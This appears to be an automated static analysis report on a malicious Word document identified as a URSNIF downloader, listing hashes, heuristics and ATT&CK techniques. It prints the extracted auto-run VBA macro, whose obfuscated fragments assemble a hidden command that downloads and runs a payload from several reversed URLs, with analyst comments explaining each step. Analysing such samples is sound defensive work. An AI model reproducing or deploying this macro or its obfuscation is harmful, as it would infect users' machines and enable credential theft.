Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d2ab7dfdf3b41c0a…

MALICIOUS

Office (OLE)

72.4 KB Created: 2018-09-10 16:35:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: 4eb91291df9b9c6acf05c9097b953a03 SHA-1: 8334ef25bd2b0ebb7a549109b983bac41f9f25c2 SHA-256: d2ab7dfdf3b41c0a6ed90b8f5dcfd366be8c953b931f4e46f1faba4b2d101a7d
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that calls the Shell() function. This indicates an attempt to execute arbitrary code when the document is opened. The macro builds the command it executes by concatenating obfuscated string fragments, most likely to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.URSNIF' further supports this assessment.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6037 bytes
SHA-256: 1050ae28c71c8e06cb953a2c2a56ecc752d86c4fdbdaa30162457a5a00c90ab0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "OLzFVDQVooYNUH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executing entry point: Word runs Document_Open when the file is opened
' (flagged above as OLE_VBA_DOCOPEN), so no user action beyond opening the
' document is needed for the Shell call below to run.
Private Sub Document_open()
' Line-continued "On Error Resume Next": any run-time error raised in this
' procedure is silently ignored, so a failing statement never stops execution.
On _
Error _
Resume _
Next
' The "Second <string>" statements look like filler. Second is not defined in
' the visible part of the listing; if it is VBA's built-in Second() (which
' expects a Date), a string argument raises a type mismatch that the error
' handler above swallows. Either way they do not appear to feed into the
' Shell argument.
   Second "ftpPXf" + "nW" + "1525" + "LisRbO"
   Second "HjYv" + "qpnuzhMUr"
   Second "528427961" + "129765028" + "412466689" + "omhw"
   Second "368720983" + "zakkKFJMU" + "kvTmkUb" + "433350859"
   Second "oKF" + "lcm"
   Second "Ic" + "Cjl" + "Hm" + "dBSMZnKovz"
' The actual payload (flagged above as OLE_VBA_SHELL): the return values of
' three functions are concatenated into one string and handed to Shell with
' window style vbHide, i.e. a hidden window. KndCT and WVswzh are shown
' further down; iWbKbwTP is outside the visible portion of the listing. The
' full command is only recoverable by reconstructing that concatenation, not
' from any single literal in this module.
Shell KndCT + WVswzh + iWbKbwTP, CStr(vbHide)
' More filler after the Shell call; execution has already happened by here.
   Second "163335906" + "mL"
   Second "SvbKwZQDQXt" + "DqNAovm" + "8121" + "OwIXwkDR"
   Second "3319" + "398096249" + "196439849" + "C"
End Sub



Attribute VB_Name = "JHJzBfUzpkp"
' Returns the first segment of the command string that Document_open passes to
' Shell. Every piece assigned below is a literal, so the return value is fixed
' and can be reconstructed offline without executing the macro.
Function KndCT()

' Same error suppression as Document_open: failures are ignored, not reported.
On _
Error _
Resume _
Next
' Filler statement (see the note in Document_open); contributes nothing to the
' return value.
Second "9055" + "499963533" + "AatOXfv" + "172868664"
' Obfuscation visible in the assignments below (no Dim / Option Explicit is
' shown, so each name is an implicitly declared variable):
'  - the command is split into many short literals joined with "+";
'  - individual characters are produced as Format(Chr(<sum of small
'    integers>)) so they never appear as plain text in the source;
'  - the dense "^" characters and the "md /V/" fragment are consistent with an
'    obfuscated cmd.exe command line, matching the report's "constructing and
'    executing a command" finding -- confirm by reconstructing the
'    concatenation in an isolated analysis environment.
UEjrTp = Format(Chr(9 + 13 + 1 + 2 + 74)) + "md /V/" + Format(Chr(6 + 9 + 1 + 1 + 50)) + Format(Chr(3 + 4 + 0 + 0 + 27)) + "^" + "se" + "^t " + "J" + "^dk=" + "^   ^" + "  ^ ^" + " ^ ^ ^ " + "    ^ " + "^ ^ ^}^"
Second "kzXX" + "689"
   Second "524211872" + "RI"
AsIDIniEIwk = "}^{" + "h" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^t^a" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^" + "};k^aer" + "b^" + ";" + "^h^tw$" + "^ m^e^t" + "^I-^e" + "k"
Second "8465" + "slpQfGI"
   Second "kRMs" + "wzVWM" + "aDqN" + "172760407"
MPjloLACXv = "^ov" + "n^" + "I^;)^ht" + "w^$ ," + "J^H" + "q^$(^el" + "^iF" + "da^oln" + "^wo"
Second "PadikzPIo" + "w" + "83821022" + "89035000"
   Second "mLpDSki" + "DL" + "mESw" + "vcCl"
iEbhFiQTCsH = "D^." + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^dw^$" + "^{^" + "y" + "r^t^{)" + Format(Chr(6 + 9 + 1 + 1 + 50)) + "li$^ " + "ni^" + " ^JH^q" + "^$(h" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "a"
Second "JFhNdG" + "v"
   Second "328805307" + "nEP" + "9703" + "muiP"
   Second "411440498" + "9151" + "5341" + "4363"
OzntjzOU = "^er^of;" + "'" + "ex" + "e^.^'" + "^+N^J" + "w$+^" + "'\'+" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "ilb^" + "up^" + ":vne^$="
Second "sfjRSscvFP" + "sjzlWABv" + "YHROi" + "IhYWUjDb"
   Second "167851122" + "421503100"
qVvwV = "h^t" + "w^" + "$^;^" + "'^" + "0^" + "9^9^'" + " " + "=^ " + "N^Jw^$"
' Return value: the six fragments above concatenated in assignment order.
' The Second statements after this line are filler and cannot change it.
KndCT = UEjrTp + AsIDIniEIwk + MPjloLACXv + iEbhFiQTCsH + OzntjzOU + qVvwV
   Second "626" + "itELtTYQI" + "135191725" + "ODR"
   Second "oPTb" + "91" + "XJXhpJH" + "nR"
   Second "lO" + "306596480" + "3560" + "irju"
   Second "492120113" + "uOpEkkpoMf"
End Function
Function WVswzh()

On _
Error _
Resume _
Next
Second "vcrOKnfULEFu" + "AWHrHXmhk"
   Second "PVGaNzlmJwaLQw" + "ssQIc" + "156814207" + "Pz"
   Second "174375226" + "4235"
   Second "GbzEYSAGzQ" + "495351349" + "w" + "Pv"
   Second "wjYEpd" + "idEZSZamDMDUN" + "7031" + "427434602"
WJWZG = ";)'^@'" + "(^ti" + "l^p" + "^S^.^'" + "^8Vo" + "^5M" + "a^" + "i" + "/m^o" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "." + "oa"
Second "Ri" + "9919" + "uc" + "M"
   Second "TXHUvoT" + "NOvLRQj" + "5138" + "XHYK"
FjCApjNcoi = "^" + "lgn^ay" + "n^" + "a^" + "itgn^i" + "j//^:" + "^" + "p" + "^t^t" + "h@^" + "M" + "^A3lA" + "Ig/o"
Second "RnEFtoWQJYqKCj" + "Ji"
   Second "171709023" + "QJtF"
   Second "iDsNHjzA" + "MjSzXPf"
UhfkJwb = "f" + "ni.^l^a" + "^" + "ht" + "n" + "e" + "iram//:"
Second "226395934" + "vorLnjlQtnXWcJ"
   Second "6930" + "91776214"
   Second "6352" + "jh"
NiprKFMw = "^p" + "tth@^x" + "/" + "^" + "gro." + Format(Chr(9 + 13 + 1 + 2 + 74)) + "d" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^-" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "b" + "//:p^"
Second "330172040" + "S"
   Second "4831" + "c" + "piGOFzziF" + "pEuI"
   Second "397986967" + "24321295"
   Second "1756" + "nCBzGTMHfn" + "phXvfJUEFQI" + "MDMlB"
   Second "aK" + "KzKn" + "8131" + "212393181"
tlLVfL = "tt" + "^h^@eR" + "^wK" + "E^3" + "^3/m" + "o" + Format(Chr(9 + 13 + 1 + 2 + 74)) + "^.^i" + "ka" + "it" + "^" + "o" + "/" + "/^:pt"
Second "424" + "2313"
   Second "29540560" + "1916" + "523109150" + "q"
mQpmCbr
... (truncated)